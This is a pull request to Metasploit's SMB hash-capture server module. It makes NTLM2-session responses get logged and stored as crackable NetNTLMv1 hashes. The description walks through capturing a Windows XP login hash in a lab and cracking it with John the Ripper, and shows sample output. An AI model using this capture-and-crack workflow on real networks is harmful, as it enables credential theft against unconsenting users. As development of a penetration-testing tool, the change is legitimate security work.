### PR TITLE
Log ntlm_session hashes too

### DIFF
--- a/lib/msf/core/exploit/remote/smb/server/hash_capture.rb
+++ b/lib/msf/core/exploit/remote/smb/server/hash_capture.rb
@@ -44,12 +44,14 @@ module Msf::Exploit::Remote::SMB::Server::HashCapture
 
       combined_hash << ":#{client_hash}"
       combined_hash << ":#{bin_to_hex(challenge)}"
+      jtr_format = JTR_NTLMV1
     when :ntlmv2
       hash_type = 'NTLMv2-SSP'
       client_hash = "#{bin_to_hex(ntlm_message.ntlm_response[0...16])}:#{bin_to_hex(ntlm_message.ntlm_response[16..-1])}"
 
       combined_hash << ":#{bin_to_hex(challenge)}"
       combined_hash << ":#{client_hash}"
+      jtr_format = JTR_NTLMV2
     end
 
     return if hash_type.nil?
@@ -61,8 +63,6 @@ module Msf::Exploit::Remote::SMB::Server::HashCapture
     print_line "[SMB] #{hash_type} Username   : #{domain}\\#{user}"
     print_line "[SMB] #{hash_type} Hash       : #{combined_hash}"
     print_line
-
-    jtr_format = ntlm_message.ntlm_version == :ntlmv1 ? JTR_NTLMV1 : JTR_NTLMV2
 
     if active_db?
       origin = create_credential_origin_service(

--- a/lib/msf/core/exploit/remote/smb/server/hash_capture.rb
+++ b/lib/msf/core/exploit/remote/smb/server/hash_capture.rb
@@ -38,7 +38,7 @@ module Msf::Exploit::Remote::SMB::Server::HashCapture
     combined_hash = "#{user}::#{domain}"
 
     case ntlm_message.ntlm_version
-    when :ntlmv1
+    when :ntlmv1, :ntlm2_session
       hash_type = 'NTLMv1-SSP'
       client_hash = "#{bin_to_hex(ntlm_message.lm_response)}:#{bin_to_hex(ntlm_message.ntlm_response)}"
 


### PR DESCRIPTION
Despite being called ntlm_session, these hashes are capable of being cracked as the John 'netntlm' format. Additionally the format is reported as NTLMv1-SSP in similar tools.

Fixes #16612

## Verification

List the steps needed to make sure this thing works

- [x] Install (or already have) a Windows XP SP2 system
- [x] Start msfconsole and the `auxiliary/server/capture/smb` module
- [x] Run the command `net use \\<capture server IP>\share /user:Administrator 123456` from the XP system
- [x] See the hash show up in msfconsole
    - Prior to these changes, the hash would not be reported because of the variation on the name from `Net::NTLM` 
- [x] From msfconsole, run the `creds -t netntlm` command, see the hash that was just captured show up in the results 
- [x] Copy that hash into a new text file
- [x] Crack that hash with John the Ripper using the `netntlm` format (showing that it's reported correctly)

## Example

Password used was `12345678`

```
[*] Auxiliary module running as background job 0.
[*] Server is running. Listening on 0.0.0.0:445
[*] Server started.
msf6 auxiliary(server/capture/smb) > creds
Credentials
===========

host  origin  service  public  private  realm  private_type  JtR Format
----  ------  -------  ------  -------  -----  ------------  ----------

msf6 auxiliary(server/capture/smb) > 
[+] Received SMB connection on Auth Capture Server!

[SMB] NTLMv1-SSP Client     : 192.168.159.17
[SMB] NTLMv1-SSP Username   : SMCINTYR-6EA900\Administrator
[SMB] NTLMv1-SSP Hash       : Administrator::SMCINTYR-6EA900:ff40ddbd935c7b1b00000000000000000000000000000000:c079c9b495afb6e9a2c0a950b2213e7f0848105f522ecdc6:7a24551e4554f909



msf6 auxiliary(server/capture/smb) > msf6 auxiliary(server/capture/smb) > creds -t netntlm
Credentials
===========

host            origin          service        public         private                                                                                              realm            private_type        JtR Format
----            ------          -------        ------         -------                                                                                              -----            ------------        ----------
192.168.159.17  192.168.159.17  445/tcp (smb)  Administrator  Administrator::SMCINTYR-6EA900:ff40ddbd935c7b1b00000000000000000000000000000000:c079c9b (TRUNCATED)  SMCINTYR-6EA900  Nonreplayable hash  netntlm

msf6 auxiliary(server/capture/smb) > 
```
